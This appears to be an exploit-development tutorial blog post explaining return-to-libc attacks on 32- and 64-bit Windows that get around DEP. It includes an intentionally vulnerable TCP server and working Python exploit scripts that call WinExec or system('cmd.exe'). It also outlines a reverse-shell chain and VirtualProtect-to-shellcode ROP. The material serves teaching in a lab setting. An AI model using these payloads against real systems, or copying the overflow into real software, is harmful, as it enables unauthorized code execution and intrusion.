Thilan Dissanayaka Exploit Development April 14, 2020

Return-to-libc on Windows

In the Linux ret2libc article, we bypassed DEP by calling system("/bin/sh") from libc. The concept on Windows is identical — call existing functions instead of injecting shellcode — but the details differ: different libraries, different calling conventions, different target functions, and different tools.

If you’re coming from the Windows buffer overflow tutorial where we used x32dbg and disabled DEP with CFF Explorer, this article picks up where that left off — but now DEP stays on.

The Windows Landscape

On Linux, the C runtime (libc) gives us system(). On Windows, we have several libraries loaded into every process:

Library	Key Functions for ret2libc
kernel32.dll	`WinExec()`, `CreateProcessA()`, `LoadLibraryA()`, `VirtualProtect()`
msvcrt.dll	`system()`, `_exec()` — C runtime functions
ntdll.dll	Low-level NT API — `NtProtectVirtualMemory()`, etc.
user32.dll	`MessageBoxA()` — useful for proof of concept

The easiest targets:

WinExec("cmd.exe", 0) — 2 arguments, launches a command. Simplest option.
system("cmd.exe") — Same as Linux, from msvcrt.dll. One argument.
VirtualProtect() — Make the stack executable, then jump to shellcode. More complex but more powerful.

We’ll start with WinExec because it’s the most straightforward.

Calling Conventions — The Critical Difference

This is where Windows and Linux diverge, and where most cross-platform exploit devs get confused.

32-bit: stdcall vs cdecl

On Linux, most functions use cdecl — arguments pushed right-to-left, caller cleans the stack.

On Windows, most Win32 API functions use stdcall — arguments pushed right-to-left, callee cleans the stack.

Why does this matter? After WinExec returns (stdcall), it pops its own arguments off the stack. ESP is in a different position than it would be after a cdecl function. This changes how we chain calls.

cdecl (Linux libc):
  Before call:  ESP → [ret_addr] [arg1] [arg2]
  After return:  ESP → [arg1] [arg2]          ← Caller must clean up

stdcall (Windows API):
  Before call:  ESP → [ret_addr] [arg1] [arg2]
  After return:  ESP → (past arg2)            ← Callee already cleaned up

For a single ret2libc call, this difference doesn’t matter much — the function returns to whatever address was on the stack. But for chaining multiple calls, stdcall is actually easier — the callee cleans up, so we don’t need pop; ret gadgets between calls.

msvcrt.dll’s system() uses cdecl (it’s a C runtime function, not a Win32 API). So system() on Windows behaves exactly like on Linux. WinExec() uses stdcall.

64-bit: Microsoft x64 Calling Convention

On 64-bit Windows, the first 4 arguments go in registers RCX, RDX, R8, R9 (not RDI, RSI like Linux). And there’s a twist: the caller must reserve 32 bytes of shadow space on the stack, even if the function has fewer than 4 arguments.

Microsoft x64:
  RCX = arg 1
  RDX = arg 2
  R8  = arg 3
  R9  = arg 4
  Stack: [shadow 32 bytes] [arg 5] [arg 6] ...

Linux System V x64:
  RDI = arg 1
  RSI = arg 2
  RDX = arg 3
  RCX = arg 4
  R8  = arg 5
  R9  = arg 6

The shadow space is the main gotcha. If you forget it, the function writes to memory it shouldn’t and crashes. We’ll cover this in the 64-bit section.

Setting Up the Lab

Same vulnerable TCP server from the Windows buffer overflow tutorial:

void handle_client(SOCKET client) {
    char buffer[512];
    int recv_size;
    recv_size = recv(client, buffer, 1024, 0);  // Overflow!
    buffer[recv_size] = '\0';
    printf("Received: %s\n", buffer);
    closesocket(client);
}

Environment:

Windows 7 32-bit (target)
DEP enabled (we do NOT disable it this time)
ASLR disabled (via CFF Explorer — set DllCharacteristics to 0x0100 for DEP-only, not 0x0000)
x32dbg for debugging

To keep ASLR off but DEP on, set the DllCharacteristics to 0x0100 (NX_COMPAT only, no DYNAMIC_BASE).

Finding Addresses with x32dbg

Launch the vulnerable server inside x32dbg. Once the process is running, we need to find our target functions and strings.

Finding WinExec

WinExec lives in kernel32.dll. In x32dbg:

Go to the Symbols tab
Select kernel32.dll from the module list
Search for “WinExec” in the search bar
Note the address

Or use the command bar:

x32dbg> GetProcAddress kernel32.dll, WinExec

Let’s say we find: WinExec = 0x7C8623AD (this varies by Windows version and patch level).

Finding system() in msvcrt.dll

If msvcrt.dll is loaded (it is for most C programs):

Symbols tab → select msvcrt.dll
Search for “system”

Let’s say: system = 0x77C293C7

Finding “cmd.exe” String

We need the string "cmd.exe" somewhere in readable memory. Options:

Option A: Search loaded modules

x32dbg → Memory Map tab → Right-click a module → Search for → String references → search “cmd”

Many Windows DLLs contain the string “cmd.exe” or “cmd” internally. If you find one, note its address.

Option B: Search the binary itself

x32dbg> findall "cmd.exe"

Option C: Use our buffer

We can place “cmd.exe” in our overflow payload and reference it by its stack address. This is less reliable (stack address changes), but works when ASLR is off.

Let’s say we find "cmd.exe" at 0x7C8369B0 inside kernel32.dll.

Finding exit() or ExitProcess()

For clean termination:

ExitProcess in kernel32.dll: 0x7C81CAFA

Exploit 1: WinExec(“cmd.exe”, 0) — 32-bit stdcall

WinExec has two parameters:

UINT WinExec(
    LPCSTR lpCmdLine,   // Command to execute ("cmd.exe")
    UINT   uCmdShow     // Window display (0 = SW_HIDE, 1 = SW_SHOWNORMAL)
);

Since stdcall pushes arguments right-to-left, the stack layout before WinExec executes:

ESP →  [return address]        ← Where WinExec returns to
ESP+4  [lpCmdLine]             ← pointer to "cmd.exe"
ESP+8  [uCmdShow]              ← 0 (hidden) or 1 (visible)

Wait — stdcall arguments are pushed right-to-left by the caller before the call instruction. But we’re arriving via ret, not call. So from WinExec’s perspective when it starts:

ESP →  [return address after WinExec]
ESP+4  [lpCmdLine = "cmd.exe" pointer]
ESP+8  [uCmdShow = 0 or 1]

This is the same layout as Linux ret2libc, just with an extra argument.

The Payload

import socket
import struct

p = lambda x: struct.pack("<I", x)

ip = "192.168.64.15"
port = 9999

offset = 528          # padding to EIP (524 to EBP + 4 for EBP)

winexec     = p(0x7C8623AD)   # WinExec in kernel32.dll
exit_proc   = p(0x7C81CAFA)   # ExitProcess in kernel32.dll
cmd_str     = p(0x7C8369B0)   # "cmd.exe" string in kernel32.dll
show_window = p(0x00000001)   # SW_SHOWNORMAL (1) — so we can see the cmd window

# Stack layout after ret:
# [padding] [WinExec] [ExitProcess] [cmd_str] [show_window]
#            ↑ EIP     ↑ return addr  ↑ arg1    ↑ arg2

payload  = b"A" * offset
payload += winexec              # Overwrite EIP → jump to WinExec
payload += exit_proc            # WinExec's return address → ExitProcess
payload += cmd_str              # arg1: lpCmdLine = "cmd.exe"
payload += show_window          # arg2: uCmdShow = 1

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(payload)
s.close()

Wait — stdcall cleanup affects chaining. After WinExec returns, it cleans up 2 arguments (8 bytes) from the stack. So ESP moves past both cmd_str and show_window. The return address (ExitProcess) is consumed by WinExec’s ret instruction, and ExitProcess executes cleanly.

For a single call, this just works.

Debugging in x32dbg

Set a breakpoint at the ret instruction of the vulnerable function. Send the payload.

x32dbg breakpoint hit.

Registers:
  EIP = 0x0804xxxx (about to execute ret)
  ESP = 0x0022F9B0

Stack at ESP:
  0x0022F9B0: 0x7C8623AD    ← WinExec (will be popped into EIP)
  0x0022F9B4: 0x7C81CAFA    ← ExitProcess (WinExec's return address)
  0x0022F9B8: 0x7C8369B0    ← "cmd.exe" pointer (arg1)
  0x0022F9BC: 0x00000001    ← SW_SHOWNORMAL (arg2)

Step into the ret:

  EIP = 0x7C8623AD (WinExec!)
  ESP = 0x0022F9B4 (past the popped address)

WinExec reads:

[ESP] = 0x7C81CAFA → return address (ExitProcess)
[ESP+4] = 0x7C8369B0 → derefs to “cmd.exe”
[ESP+8] = 0x00000001 → SW_SHOWNORMAL

Continue execution → cmd.exe window appears.

Exploit 2: system(“cmd.exe”) via msvcrt.dll

If msvcrt.dll is loaded, we can use system() — which uses cdecl, behaving exactly like Linux.

system_addr = p(0x77C293C7)   # system() in msvcrt.dll
exit_proc   = p(0x7C81CAFA)   # ExitProcess
cmd_str     = p(0x7C8369B0)   # "cmd.exe"

payload  = b"A" * offset
payload += system_addr          # EIP → system()
payload += exit_proc            # system's return address → ExitProcess
payload += cmd_str              # system's argument: "cmd.exe"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(payload)
s.close()

Identical layout to Linux ret2libc. cdecl is cdecl regardless of OS.

Chaining Functions — stdcall Makes It Easier

Here’s where stdcall actually helps us. Since the callee cleans up its own arguments, we don’t need pop; ret gadgets between calls.

Example: Call LoadLibraryA("ws2_32.dll") then WinExec("cmd.exe", 1):

stdcall chain:
[padding] [LoadLibraryA] [WinExec] [ptr "ws2_32.dll"] [ptr "cmd.exe"] [1]
           ↑ EIP          ↑ return   ↑ LoadLib arg1     ↑ WinExec arg1  ↑ arg2

After LoadLibraryA returns:

It cleans its 1 argument (4 bytes) from the stack
ret pops WinExec address into EIP
ESP now points to cmd_str — exactly where WinExec expects its first argument

No gadgets needed. stdcall’s cleanup behavior naturally chains function calls.

Compare to cdecl (Linux):

cdecl chain (needs pop;ret gadgets):
[padding] [setuid] [pop;ret] [0] [system] [exit] ["/bin/sh"]

On Linux, we needed a pop; ret gadget to clean up setuid’s argument before system(). On Windows with stdcall, the function does it for us.

The catch: The number of arguments must match exactly. If a stdcall function expects 2 arguments, it pops 8 bytes. If you get the argument count wrong, the stack is misaligned and the chain breaks.

Exploit 3: Reverse Shell — Chaining Multiple Calls

For a remote exploit, a cmd.exe window on the target machine isn’t useful — we need a reverse shell. This requires chaining several calls to load WinSock and connect back to us.

This gets complex enough that ROP is usually the better approach. But here’s the conceptual chain:

LoadLibraryA("ws2_32.dll")      → Load WinSock library
WSAStartup(0x0202, &wsadata)    → Initialize WinSock
WSASocketA(2, 1, 0, 0, 0, 0)   → Create a TCP socket
connect(sock, &sockaddr, 16)    → Connect to attacker
CreateProcessA(NULL, "cmd.exe", ..., &startupinfo, ...) → Spawn cmd with redirected I/O

Each function has multiple arguments, and CreateProcessA has 10 parameters. Managing this with ret2libc alone is painful — this is exactly where ROP chains become necessary.

For practical remote exploitation on Windows, the typical approach is:

ret2libc: VirtualProtect(stack, 0x1000, PAGE_EXECUTE_READWRITE, &old)
     ↓
Stack is now executable
     ↓
Jump to shellcode on the stack (reverse shell shellcode from msfvenom)

This combines ret2libc (one function call to disable DEP for our stack region) with traditional shellcode execution.

64-bit Windows — The Shadow Space Problem

On 64-bit Windows, the calling convention is Microsoft x64 fastcall:

First 4 arguments: RCX, RDX, R8, R9
The caller must allocate 32 bytes of shadow space on the stack before the call
Additional arguments go on the stack after the shadow space

Stack layout for a function call (64-bit Windows):
RSP →  [return address]
RSP+8  [shadow space: 32 bytes (even if unused)]
RSP+40 [5th argument, if any]
RSP+48 [6th argument, if any]

The shadow space exists so the callee can spill the register arguments to the stack if needed. The callee expects this space to be there — if it’s not, the function writes to memory it shouldn’t and crashes.

ret2libc on 64-bit Windows

We need gadgets to:

Load RCX with the first argument (pop rcx; ret)
Ensure 32 bytes of shadow space exist below the function’s return point

from struct import pack
p64 = lambda x: pack("<Q", x)

offset = 72                          # varies per binary

pop_rcx  = p64(0x00007FFA1234ABCD)   # pop rcx; ret (from a loaded DLL)
cmd_str  = p64(0x00007FFA56789012)   # "cmd.exe" string address
winexec  = p64(0x00007FFA11223344)   # WinExec address
ret      = p64(0x00007FFA1234ABCE)   # ret gadget (alignment)
exit_p   = p64(0x00007FFA55667788)   # ExitProcess

payload  = b"A" * offset
payload += pop_rcx                   # Load first arg into RCX
payload += cmd_str                   # RCX = "cmd.exe"
payload += p64(0x00000000)           # RDX = 0 (second arg — uCmdShow)
                                     # Actually need pop rdx; ret here too
payload += ret                       # Alignment
payload += winexec                   # Call WinExec
# Shadow space and additional stack setup needed...

In practice, 64-bit Windows ret2libc almost always requires ROP gadgets to set up registers — the line between ret2libc and ROP disappears entirely on 64-bit.

Finding Addresses in x32dbg — Quick Reference

Finding functions:
  Symbols tab → Select module (kernel32, msvcrt, ntdll)
  → Search for function name
  → Note the address

Finding strings:
  Memory Map → Right-click module → Search for → String references
  Or: CPU tab → Right-click → Search for → All referenced strings

Finding gadgets (for chaining):
  Plugins → OllyDumpEx or use ROPgadget externally:
  $ ROPgadget --binary kernel32.dll --search "pop ecx"

Setting breakpoints:
  Command bar: bp 0x7C8623AD  (break on WinExec)
  Or: Ctrl+G → enter address → F2

Examining the stack:
  Stack panel shows ESP and values
  Or: dump at ESP in the hex dump panel

Checking DEP status:
  Debug → Memory Map → check page permissions
  Stack pages should show "RW" (not "RWX")

Comparison — Linux vs Windows ret2libc

Aspect	Linux	Windows
Target function	`system("/bin/sh")`	`WinExec("cmd.exe", 1)` or `system("cmd.exe")`
Library	libc.so	kernel32.dll, msvcrt.dll
32-bit convention	cdecl (caller cleans)	stdcall (callee cleans) for API, cdecl for CRT
64-bit convention	System V (rdi, rsi, rdx)	MS x64 (rcx, rdx, r8, r9 + 32-byte shadow)
Chaining (32-bit)	Needs `pop; ret` between calls	stdcall chains naturally (callee cleans)
String availability	“/bin/sh” in libc	“cmd.exe” sometimes in kernel32 (search required)
Debugger	GDB	x32dbg / x64dbg
DEP control	Compile flags / sysctl	PE header DllCharacteristics
Gadget tools	ROPgadget, ropper	ROPgadget, ropper, mona.py (Immunity)

The fundamental technique is the same. You’re overwriting the return address with a function pointer and arranging arguments on the stack. The OS-specific details are calling conventions, target functions, and tooling.

When ret2libc Isn’t Enough

Just like on Linux, Windows ret2libc has limitations:

Complex payloads (reverse shells) require too many chained calls
64-bit requires register gadgets anyway (it’s already ROP)
ASLR randomizes kernel32.dll and msvcrt.dll base addresses

The most common Windows DEP bypass in practice:

ROP chain → VirtualProtect(stack_addr, size, PAGE_EXECUTE_READWRITE, &old)
         → Stack is now executable
         → Jump to shellcode on the stack

This requires a full ROP chain to set up VirtualProtect’s 4 arguments, but the result is powerful — you get unrestricted code execution via shellcode once DEP is disabled for your stack region.

For building Windows ROP chains, mona.py (a plugin for Immunity Debugger) is the gold standard:

!mona rop -m kernel32.dll,msvcrt.dll
!mona rop -m * -cpb "\x00\x0a\x0d"

It automatically finds gadgets and generates VirtualProtect / VirtualAlloc ROP chains.

Final Thoughts

ret2libc on Windows follows the same principle as Linux — reuse existing code to bypass DEP. The main differences are the calling conventions (stdcall vs cdecl, shadow space on 64-bit) and the target functions (WinExec, CreateProcess, VirtualProtect instead of system and execve).

If you’re comfortable with the Linux ret2libc and the Windows buffer overflow, this article bridges the two. The next step — building full ROP chains on Windows — is where the real power lies, especially the VirtualProtect technique that re-enables shellcode execution.

Happy reversing!